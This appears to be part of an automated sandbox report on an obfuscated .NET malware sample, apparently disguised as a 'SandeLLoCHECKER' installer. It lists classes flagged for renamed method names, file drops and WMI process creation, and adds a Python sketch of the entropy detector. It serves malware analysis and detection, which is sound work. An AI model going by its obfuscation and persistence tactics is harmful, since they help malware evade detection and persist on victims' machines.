Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, FchRb1SVZ7N7a93JpwO.cs High entropy of concatenated method names: 'udfSp0WoYS', 'aeJSXOrcXf', 'GdLSym0kKf', 'ctmSgEfuFN', 'pQjSjKABD0', 'Lg4Sbb7JjD', 'aoaSU8sjas', 'DhsS7gafWl', 'YImSTXlB5d', 'DH3SHwBGA0'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Nuy0qpj60KsKbdtiNsb.cs High entropy of concatenated method names: '_34V', 'y7u', 'uSuPyaw2jcb', 'oMHjeMhEfP', 'gt1', 'GIdHtRPdolFitbkJUa2x', 'r7fvTKPdGEfXHkw7rTPk', 'KOOMP4Pd60Eevw8uvf2W', 'kAxml7PdesBd2Pp9UaD0', 'aU57BAPdwuJRlV9EHFbx'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Ej0Xy6d9on9wNkV3GZf.cs High entropy of concatenated method names: 'bURdGc5lpS', 'acyd6Zr7an', 'LJkdouwoIw', 'UgOde6qjmP', 'kpJdwQFyO9', 'R1DdiPlNLy', 'p2RdnafAjs', 'h4ddDBSxpg', 'gRFd0rq3Oi', 'xiKdSFD3pv'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, q8HY0wjaUJ8pLk18fTc.cs High entropy of concatenated method names: '_2SY', 'vEkPyfpmO2u', 'eZEjtu11k8', 'L4WPyd7F5Rn', 'oWW7N0PdfOYbm663OpqC', 'vctUN5PddhAb0tUrX7BO', 'ssJlW8PdrQmaUCyaIn9A', 'ENP97iPdMUYQjvuNnWdG', 's7joQjPdaPoEIyv101oy', 'FgBbbTPd4eDPbuXyIhkL'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, qYWRDXOpUgncqEf7rRI.cs High entropy of concatenated method names: 'NTKCYOPnYEwbxbvTvJUr', 'ksG9koPnuZ8fVvMMnmAq', 'iXeIUwPnKEShLfpNNq7R', 'UqclCgPnCLC9l9w6kvQC', 'BF7OyUtk3R', '_1R8', '_3eK', 'lpPOg5ILs7', 'gfdOjpce6w', 'hwOObfE2Pq'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Hijtm5rwIlRCPNqqVvc.cs High entropy of concatenated method names: '_25r', 'h65', 'jPPrngxSfR', 'R4UrDRAUDa', 'NtFr0o3irY', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, nG0f7XaQOOUwKKI15KW.cs High entropy of concatenated method names: 'ixLvtmPSCpFB3DdhdsJA', 'qGUKCrPSRN28cGwFgZE5', 'uCnpjKPSKXyZd0xyjpBf', 'og4jQpPSYFykL9OSQV4a', 'LdZe12PSDFb98rdIypfd', 'rUNcWAPS0mA9i5EwxA7J', 'k8NANQPSSDI2DiI79fAd', 'bb4TxEPSi6HNEcu4v3ud', 'ie9VH1PSn3nZjsgYk6eg'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, h1AqtqghrhGCwqBVqW2.cs High entropy of concatenated method names: '_816', 'd65', 'PhlPVXrBn6c', 'E8OPVy7KTfk', 'h48PyAGWT6T', 'QdTPVWV2OZ4', 'oeioKhPfPcxFvdef4WjQ', 'uBnHYkPfEbsa8LgK3OGe', 'V8MNMUPMz6qJabZEfmVJ', 'iCSDLgPfWqXyB3s5shOn'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, DqUJLocjGfEu5kLhkth.cs High entropy of concatenated method names: 'aohcUgfLfj', 'KyDc7rPo5J', 'ybOcThAaay', 'bM24G7PJWsNXqwqVqi6F', 'LY0aUDPJPNcYmWmvcX28', 'DueTbFP8s65OnKq6IAHZ', 'GSHB3MP8zd1LM8cdKckG', 'Nb7yhyPJEKZeZgh1Or3P', 'fn1P8WPJcX1gM9gkG03i', 'BnYPPxPJVnw3SuBU4Q6F'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Rd7bUtFOS2LXqMvDbtJ.cs High entropy of concatenated method names: 'LQgFrL0v2X', 'Fg2FMCqDYV', 'fstFf1w7r8', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'Qa2FdmuJsP'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, r3dttWjIO977RG8ERRe.cs High entropy of concatenated method names: '_5t1', 'd65', 'oT4PVqiN1A2', 'DH7PV1qjeJC', 'bwAjBh6HkR', 'cARPylmVrKS', 'QdTPVWV2OZ4', 'IXIeGsPdpi1n8wTFChFL', 'Qn228GPdXq34uXeixhcP', 'KOiIsCPdyme1TvPewXvS'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, O2LsuHnD7eKXV8tTYpV.cs High entropy of concatenated method names: 'rXSPyo5KlCO', 'CDUnST80XV', 'KCrnuM4mPQ', 'EQenKVxC9t', 'ehEEaiPuSgDksUkxwWM5', 'Ouxdg6PuuKIfAcPRGiDQ', 'BdR4cDPuK3yvwHy8EOA1', 'Bx6tg0PuYQZiiLYZ5A5H', 'IwJl8FPuCTfmiQAwq6Tt', 't1dAApPuRqeE0VmwEJGd'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Ml2j2lF11FrlMtr5Vhp.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, u0ZCQmD2P7aBhNr4Ty8.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'IvTD1n1iv8', 'CIV7ovPKDgG9hCTX47is', 'lBLIIoPK0jusImTyhdr9', 'm1k0uvPKSEb9JgPdMy8Q', 'vwIeX3PKunPejgSmBCXi', 'eo0sWmPKKYKmfIgsZpEi', 'BdFUYkPKY0IUsReIlQYI'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, CZgC3ggukDME7ZdFasJ.cs High entropy of concatenated method names: '_46E', 'd65', 'ODMgY8dNfK', 'uvHPyJkx6dl', 'QdTPVWV2OZ4', 'LJugCrLJVc', 'adOsBqPftgGsWuav9caL', 'FWdpghPfa2mpGlG3wSew', 's62gI7Pf4l3XfC2jX5jt', 'nNmkoxPf9OwncxFNDNpR'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, MLrFvB5QhaBS5oP7tqe.cs High entropy of concatenated method names: 'EwR5ZYBCt7', 'XfX5maTfE1', 'TdN53agmBG', 'YMl5AO2Wbx', 'XvN52vMyIr', 'Btn5qHx5S9', 'jJXWHBPeAiiiVMf57HlL', 'H5a18ZPe2tW7C9A9hfvE', 'VPNWZsPeqrkPfPoyTbPy', 'Jeng3uPe1R3hcRPOxeTK'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, DG7CAjg11v9voFo0UIE.cs High entropy of concatenated method names: '_71a', 'd65', 'eFGPVbdBhYi', 'LpOPVUjWosJ', 'Xw3Pyqys44Z', 'QdTPVWV2OZ4', 'xpu9tjPfbjh056SxDEQR', 'JJ1Cl3PfUIlPPa5TGVed', 'buDspJPf7eFkAbGuND5C', 'XWEkLsPfTkfaOsC1xIwH'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, D4Ehs2lmHmrfxki3xMn.cs High entropy of concatenated method names: 'hvYrII8nwR', 'dG8Y8rPDjkV7orXKgWPF', 'ilBbv1PDbvTYhJ1bkXHD', 'i5X', 'E4blA3YNJm', 'W93', 'L67', '_2PR', 'p6J', 'Wxw'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ywClWgIzK9tSHfqUg3D.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'wmEvPyjqLn', 'KujvEKmfa7', 'gY2', 'rV4', '_28E'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, S8oHA1gzNokh1w73vVe.cs High entropy of concatenated method names: 'UtgjpuEmFk', 'iIL2ZCPf0FfR6Ff71FrK', 'nrlD38PfSL7DmR83yaUp', 'ywy08QPfu3DtnubUqPOS', 'eq7', 'd65', 'gFgPVkaeUfY', 'yGGPVZKuNb8', 'n1RPyF36bDy', 'QdTPVWV2OZ4'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ut9c1OBEeLy1RdKL830.cs High entropy of concatenated method names: 'fboBBtWK0Z', 'wf9BN6Uhv7', 'gKDBV7MyOs', 'VUeBxMMLT0', 'yRvBpSK6QQ', 'k8JBXG9hkW', 'hXLBydv7ts', 'wOFBgvKYht', 'eLPBjcIHR6', 'KSYBbCWok7'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Hqi5RUPw1HDt3StWY5b.cs High entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'G81Pyhntxwk', 'QVHPcnQW3if', 'ldwT9vP5mMjO7KsMnveW', 'XtgGd7P53FVUu8Oc6MGC', 'iYfyk2P5A5GsgFh5UIQM'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, vaKqEbJ6liK7hxUqnyV.cs High entropy of concatenated method names: 'AEm', 'by1', 'onbJeYpAAP', 'uM7', '_197', 'rZu', 'Q1J', '_24u', 'U67', 'xj7'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, z1pPglzrigX3shbgBD.cs High entropy of concatenated method names: 'M8GPP7Y8K7', 'JE0PcRqfdQ', 'qvEPVg8Q7W', 't0YPxPFReg', 'QycPpFiqUp', 'y42PXu1xT4', 'gTCPgTpVM4', 'MkeQpgP15K2iNgtqnIJ8', 'RDu9e9P18QRrLR0ulyT4', 'Ud103GP1JOSZaFyrA8lf'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, VRgCjdPhhi5tyxNrren.cs High entropy of concatenated method names: '_1ay', 'V29', 'FLl', 'QUh', '_2Q4', '_68a', 'tDAPyHm2hhR', 'QVHPcnQW3if', 'hPSFKQP16hiLtkTH0SDN', 'gvHF7DP1owEPhK3Ca7pT'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, eUjsYt7GgWRbVxCPNOs.cs High entropy of concatenated method names: 'XPv7op5VsR', 'bdJ7eacurm', 'Bd67wIUkM8', 'xl07iOSPTH', 'sBp7nmjpnQ', 'ycm9lqP47G3eSPCr97rP', 'D1WOySP4bv5hjTuDM3lM', 'C0sCuAP4UHQB9uU4iaXw', 'MuDdisP4ToDoSyG7CjiH', 'OPu6v9P4HEAHoDJXLgms'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, nWjnhvjl5eaYuLm9M2m.cs High entropy of concatenated method names: 'Yi3', 'VeXPyrdOqL5', 'Rj5jMxCXAB', 'HJyPyMCE6qd', 'lBvAu4Pd54lfIaspwG9w', 'GgUAmIPd8vhSljl8JPqE', 's7xJxPPdqMHrrCCJDOlH', 'GOMlZ7Pd1m1NQw48RaIJ', 'y7BOQGPdJL7djwToAq7b', 'BqiYTXPdFiWtDn0I2NTe'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, K0wwMppXdT2og4pdbSv.cs High entropy of concatenated method names: 'PXDpQoa5xr', 'R6qpk9S9aq', 'Qb8hafPlT6UIQyUS44PH', 'QmRUJSPlHQfe46laBiKw', 'i9gavUPlUr4x816NMH3D', 'yi9jwrPl7gnJyT54kAqs', 'UF8pBvLuyo', 'KXOphK9h5j', 'c5f6PfPlgnPBprwWhNUy', 'f5FM1qPlXA3Hj4YrP48K'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, B2ihpQvm6fdtsVho345.cs High entropy of concatenated method names: 'hsvvocURc3', 'atFvALfYaA', 'P2iv20CH2c', 'uXUvqEO5bd', 'UvDv1Q9IWQ', 'NhRv5t7ZKe', 'dPAv8EMIU6', 'eUqvJV7pvP', 'bc5vF5OU5f', 'DiNvOIUAlH'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, L3m1kGcvfCGO31E7gwI.cs High entropy of concatenated method names: 'Cpac5b05M5', 'FkJc8FmHjM', 'MxjcJMDeqD', 'nvErm3PJkeJTqg9H6uG9', 'ERaTuAPJNCqYGFoUQj66', 'dGdh00PJQ1Hv5HrWYxwN', 'wW3X8rPJZkSv8xDHA4kc', 'bD5cANn0DW', 'zoRc2mWX7J', 'SD85TWPJBHUhCeFlDkuQ'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, HBQsP85c64bCVlE0V96.cs High entropy of concatenated method names: 'vur5xgGfmI', 'kxR5pJAJT5', 'TXd5XbtsRr', 'THM5yRdWMB', 'tbj5gLmLs8', 'bIOgcVPeVV53Jbj6hEag', 'MSv0TgPexOq8VpaHDuHl', 'oNSt5IPepPRw5TVoIfdj', 'YnixC8PeXYGHuOVERTNx', 'T57S0vPeypo2DMBtVpOW'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, evoSWjV2x1KrAWWYkSX.cs High entropy of concatenated method names: 'QIOV1pk6mF', 'WcLV5acqDV', 'blXV8WLfLi', 'XW6VJVMpJM', 'DC1x6yPF1oPwwNYgkFGF', 'hMnqQyPF2TAwxsfGtlXi', 'yelVWwPFqVhsjIZmSaAg', 'UhMPwvPF5g0c8X6wkRqu', 'wFQEGuPF8We0nb8X07Ds', 'bmGvvRPFJO4hYAsL2OMv'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Q09Tr8MyGCmjnDf1hJI.cs High entropy of concatenated method names: 'Ge3MjqOyyM', '_64r', '_69F', '_478', 'QcLMbhG9lO', '_4D8', 'A1gMU9NgYT', 'gpuM7NxJay', '_4qr', 'e5bMTEb4Qq'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, jU5Xcb077lu5uCeTr5D.cs High entropy of concatenated method names: 'la9PpdYN8Ax', 'Qo8Ppay0dSD', 'K7iPp4hc2j8', 'UyPcg6PYYBg6yDsaSPVv', 'xS4eZcPYurrAS87O3IZU', 'PdkkxvPYKYAdRHxZhf8r', 'iDbdlVPYCfJM5g0BOjtV', 'QDZPye16rQy', 'Qo8Ppay0dSD', 'fV3wipPCWWhlvMopW6MI'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, mJayVMXugotKSN9LcZF.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'ML3jbjPrwRo7LMJCEnKm', 'YJZx8JPrilwhlQuAAliQ', 'BiJJNrPrnGoBu4xi9pw6', 'zNdpYWPrD0tyowHaIf89'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, g0QXCGDFWYE7Wyq3Zvf.cs High entropy of concatenated method names: 'ELODrGhT54', 'aZRDabNpf3', 'qXyD9YBhSD', 'JtFDLQoYMw', 'Dv7DGSNO6n', 'MyqD6H2hmU', 't1lDo3eNMk', 'q3nDeOiuKc', '_0023Nn', 'Dispose'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, FAUtgjxeQ441jYkI93F.cs High entropy of concatenated method names: 'XvjxC26loh', 'FNJxRjeflK', 'aPgPFWPOebxs0lB7vvj3', 'iG9Km7PO6CD3Rkq4IA4D', 'rNsx0vPOo2H7rEICD9lc', 'OWLxRdPOwiGExS0mogvR', 'IIYpPNnNNN', 'hGhhvUPO0kn5xnZu7psS', 'EATquQPOnp9LyOVYbva6', 'g4Z7S2PODEcXJWUBDTuM'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, SV4p82nYIORxamaMOEj.cs High entropy of concatenated method names: 'CwMDU4IiEb', 'O5xEfePKFP60RZoq2QPT', 'Mbfc96PKO9fpnvLG9BR7', 'bK41A1PK8LXtnnAiikUx', 'dSsIbvPKJWioWHpMCO79', 'VlG6CwPKlKPMqfJZqNm5', 'CPX', 'h7V', 'G6s', '_2r8'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, yRC9YOB7TQJKwxAnYJ.cs High entropy of concatenated method names: 'WHKrNand3', 'l1I0BJPqKoVb4xq88Zqm', 'tvw5IvPqY68jRQwUXqVy', 'ePr2brPqSECDMpCkCnqW', 'UAHwM4Pqu7Vt23nCqRLD', 'qnnNLM6O5', 'eoxQw7xOu', 'WuXkLH6kd', 't1NZ4h3uQ', 'jxMm9E2KT'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, IQgcRJp6myeYm5oS483.cs High entropy of concatenated method names: 'GkgXWhS3D8', 'S84XPyRtrj', 'mm3XEZTpni', 'AYkgO0PlYW3l2iCCOSOH', 'n7XDqpPlusJtLvVNr0jr', 'I5USd1PlKnOvFjewkQBn', 'HJeperi4yU', 'munpwP2RUd', 'JNgpiRvhpK', 'y0BpneJ4cn'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Y22Kg9HsG4IShK4ve9Q.cs High entropy of concatenated method names: 'ggcIWpp61Z', 'u7CIPrktFk', 'FHsIETlUxp', 'v3tIcQXZjk', 'ubOIVWrivs', 'AAP7i0PtUtQqtbd1iC0A', 'wqCpiGPt7v0MZ7g1w8hx', 'OXBikDPtTNjS463twCoV', 'WSGorbPtH4wAquj0sBHX', 'ESVD5sPtIVfl4rkSFxrw'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, orVLMXEJPhMal4vtLDs.cs High entropy of concatenated method names: 'sMwEtfi0qp', 'c9sQ6JP8mKgIvQoFDqyc', 'YIMQLXP8kIxjbSoOFQ3S', 'PTX47wP8ZEtWvGnJstc0', 'dvAloRP83q2ETLyIfScV', 'WwYLHAP8ANljSejTVRle', 'AfpEONXZkT', 'h6jElkPHKa', 'OdNErSJweH', 'e36EM334o4'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Fn4I2k0VD332F4EsjfA.cs High entropy of concatenated method names: 'vKo0pj0kDy', 'xcs0XiN28e', 'qi10yVZKvw', 'HWL0gHwwD5', '_0023Nn', 'Dispose', 'rNQF0SPYvPwNDTbP64t5', 'v8rs0wPYBcu4LbfiCYqG', 'ylQnHtPYhY8iTSwfGNrD', 'cYHYVrPYNOZAChBMI10V'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ROuXmmRZfJ3Y7ku0lRp.cs High entropy of concatenated method names: 'NsHRlfZfPL', 'axfRrPR5dI', 'sGkRMWxeNf', 'RDeRfbwoVo', 'nQGRdHtsBu', 'MywRatN8nj', 'IhRR48iExq', 'w8ZRtswnAI', 'u6OR9MBoPf', 'dsIRLFZ5Yp'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, mbEZgqEy43aJP9LZ9Yt.cs High entropy of concatenated method names: 'Pe2EjEOK3C', 'xR2EbOKAk0', 'f3SEUDOmdi', 'zWx5m9P5nOIVAHMsXSui', 'kMfwmRP5wBqLKcj0rOkf', 'XjdbmHP5iLX6XGCYM9yY', 'LH9oFhP5DDR5A9bOyHXA', 'oSnwVGP50yHFUb0vxfwW', 'nxOJZ8P5SXXgXP55NV0s', 'USNp3HP5uR38DwMQTngC'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, G6wdofVMPB8Xm2PXZdu.cs High entropy of concatenated method names: 'wQZVd1eTNb', 'PCHVaY9HvY', 'DfQQj1PFMQHvrGYqmcv2', 'ftBA9yPFfEUPYRIflVZw', 'H1ND17PFdQ6TxyCsRlLS', 'Dt3QWPPFaspeNqeyB0TB', 'p6RThtPF4ou35ttRNxKq', 'q05RtQPFtELJZUALHlpg', 'Bj4o9XPF9rWNLBFYXQ8A'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, VONH6ZRBck0LT59jToQ.cs High entropy of concatenated method names: 'XQJEphIDm9P', 'bqfEpN51ef4', 'b1kBvYPsQy6OVb3OFyCA', 'OY5kIVPskx8P0W9trhfv', 'acEJwsPsZQUL8ZshpkDc', 'SDStSTPsmyOsv1aAnWFc', 'zplBEgPs3HR9aK5GuIWa'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, sEy7PPxmEaWZWEjVqX2.cs High entropy of concatenated method names: 'iDixMmCTxt', 'HRBxfd95gN', 'fSDew2POOf8SgMK1GwEK', 'JOh0EiPOlKrDvBpKMJhN', 'LPm3yyPOrc2XmK3midIk', 'UklxAj0IpX', 'Uk2x2uoj7F', 'kbWxq9covJ', 'redx1VbAXQ', 'LPUx5e5Dpy'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, j0v7ClTHh2LSLnu6RKg.cs High entropy of concatenated method names: 'BFDTvcHDh1', 'BXPTB20pwP', 'xacTheSW3s', 'hiQh3IP45l8XPdQYK1DK', 'ftnaYmP4qICvZ395q9Rg', 'kqxkXHP41XhZbKEiwJlH', 'pYm3wZP48914yhkeDiAs', 'xEqcmlP4J90Stt0aGHR8', 'pZMFI4P4FUK7LZjBGoNk'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, tEKB20jYsCoCN4ugihH.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'DQhjRS78Bt', 'BM1Py9ZiDP6', 'E3DjsqfOdA', 'Ms0PyLSj6tu', 'QwB4AuPdRRkOxbSrMDBw', 'CkJvYJPdYD1mMy9TXQFq', 'yu2ei1PdCaeEwB2Slf3J'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, RKnKBN8kxRoEokhBv5A.cs High entropy of concatenated method names: 'W9L8mLWMjq', 'Uks83uOsaa', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'MuS8Ay942M', '_96S', '_9s5'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, frT9WSx7KUVpAqAhOZL.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'uq8PykL8DYq', 'e9jPczqMGhv', 'ejZj2RPOIdeEeJLGHfUx', 'qFXO2WPOvoOujIlSF4iF', 'q2wH9RPOBG5MONxOfvxG', 'UECjHXPOhq4oIhBtnyDU', '_6l7'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, BKJdS9EPgm7tZTr153j.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'PrUPyQ3HpMJ', 'QVHPcnQW3if', 'XM4uvmP5tn7qKqpaZN7W', 'XrJicFP59dTwwBeBpwaj', 'HvZknyP5LJFlkNkAEktH'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, xtueugBSWqSbkQ841b2.cs High entropy of concatenated method names: 'u1kDVTPGeY0yAg7OsfOs', 'JSagi6PGwnZQrjY6Ov8j', 'djJgg5PGi4asXktoshZl', 'kVIm2BpCSg', 'xIgOGgPGScVcKUodrcZh', 'lFfYPsPGDccwnmFTItVp', 'OVBtRTPG0d5mUkDUej0C', 'nYjxQAPGuEqAVo0P7g0v', 'UlPLyRPGKBVdZMFQVol6', 'Cwpm5KRYaZ'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, doaogxFK4NguqBQ3UEW.cs High entropy of concatenated method names: '_2JN', 'A67', '_49I', 'WxWFC2owoX', 'Yk3FRNVI2L', 'qdyFsNItVu', 'no9Fz5Qcjq', 'wegOW1cmPk', 'sEvOPhwwyh', 'hB6vIUPnMrYDX0QFTp3m'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, wXHnSVdhUW6HVo7oae6.cs High entropy of concatenated method names: 'a7hdQwASwL', 'lmIdkjsyI2', 'TLjdZSFSwu', 'UtSdmUJAeq', 'r8hd3rUe58', 'IhidApLBQI', 'pghd2AO7uB', 'kqLdq4I3NW', 'hT8d1iTTfC', 'fGad5vfS6Z'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, wOpr12PqyLlMwplBZWS.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'XshPyIs1mSg', 'QVHPcnQW3if', 'IedVr1P1KQcbjbhkkJt5', 'B5qO8pP1Y1WN8gWj6ql3', 'nmfyOnP1CRjSIAYRD6J9'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, v7SV9OywgqY5yWJq6eG.cs High entropy of concatenated method names: 'YUxyufEVSa', 'LAbyKXtppI', 'wihyY7PZH7', 'k9oyCZcQRW', 'SC9yRVRX0I', 'pd7ysuhSgG', 'Fg5yzswiA3', 'aVHEgbPMdvMfAvvwHktf', 'bph8ToPMaYbhInTPD9tZ', 'hoWGofPM4HEcJ9KfBA2r'
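The "High entropy of concatenated method names" signature is a cheap symbol-renaming detector for .NET: an obfuscator replaces method names with random alphanumeric strings, so the character distribution of all names in a class joined together approaches that of random text, whereas hand-written names reuse a small vocabulary. The following is an added example (my code, not Joe Sandbox's) that reproduces the heuristic on the report's own lines: it parses the class and the quoted names out of a line, computes the Shannon entropy of the concatenation, and flags classes above a threshold. The first sample line is copied from the report; the second is a constructed control with ordinary names in the same format, and the 4.6 bits-per-character threshold is an assumption, since the page does not state the value Joe Sandbox uses.

```python
from __future__ import annotations
import math
import re
from collections import Counter

# Shape of the report's lines: unpacked-module name, class file, then the
# quoted method names. The pattern accepts the line with or without the space
# the web rendering drops after ".cs".
ENTROPY_LINE_RE = re.compile(
    r"Source:\s*(?P<unpack>\S+),\s*(?P<cls>\S+\.cs)\s*"
    r"High entropy of concatenated method names:\s*(?P<names>.+)$"
)
NAME_RE = re.compile(r"'([^']*)'")


def shannon_entropy(s: str) -> float:
    """Bits per character of s under its own character frequencies."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def class_entropy(names: list[str]) -> float:
    """Entropy of the method names joined, as the signature name describes."""
    return shannon_entropy("".join(names))


def parse_entropy_line(line: str) -> tuple[str, list[str]] | None:
    m = ENTROPY_LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("cls"), NAME_RE.findall(m.group("names"))


def flag_obfuscated(lines: list[str], threshold: float = 4.6) -> list[tuple[str, float]]:
    """Return (class, entropy) for every parsable line at or above threshold.
    The threshold is an assumption for this example, not Joe Sandbox's value."""
    flagged = []
    for line in lines:
        parsed = parse_entropy_line(line)
        if parsed is None:
            continue
        cls, names = parsed
        h = class_entropy(names)
        if h >= threshold:
            flagged.append((cls, round(h, 2)))
    return flagged


SAMPLE_LINES = [
    # Copied from the report above.
    "Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, abDY9GRGyg7f4yrWnjk.cs High entropy of "
    "concatenated method names: 'kpRPpwwKqWG', 'Wn4PpiPC6GN', 'RwCPpnmA2AR', 'b8SPpDd8hTh', "
    "'lsAPp0qG7E3', 'faFPpSmrjq2', 'HJsPpuHx8Vp', 'rFSsglSHDe', 'mLAPpKnUNSw', 'HgIPpYUTfQD'",
    # Constructed control in the same format: a sandbox would not emit this line.
    "Source: constructed.unpack, BenignHelper.cs High entropy of concatenated method names: "
    "'Dispose', 'GetValue', 'SetValue', 'GetName', 'SetName', 'ToString', 'Equals', "
    "'GetHashCode', 'Add', 'Remove'",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        cls, names = parse_entropy_line(line)
        print(f"{cls}: {class_entropy(names):.2f} bits/char over {len(names)} names")
    print("flagged:", flag_obfuscated(SAMPLE_LINES))
```

Lines such as the ones listing `'_0023Nn', 'Dispose'` show why the score is taken over the whole set: a couple of ordinary or compiler-generated names in a class of renamed ones barely move the concatenated entropy, so the class is still flagged.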

Persistence and Installation Behavior

Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\OfhhMrNQ.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\UvPgJftz.log
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\MSI47C9.tmp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\lNILRSep.log
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\MSI46ED.tmp
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\MSI44B9.tmp
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\UplOiJFY.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\yYksYVbT.log
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | File created: C:\Users\user\AppData\Local\Temp\shi436E.tmp
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI4DB5.tmp
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | File created: C:\Users\user\Desktop\MAAYLQkP.log
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\OWmHElNj.log
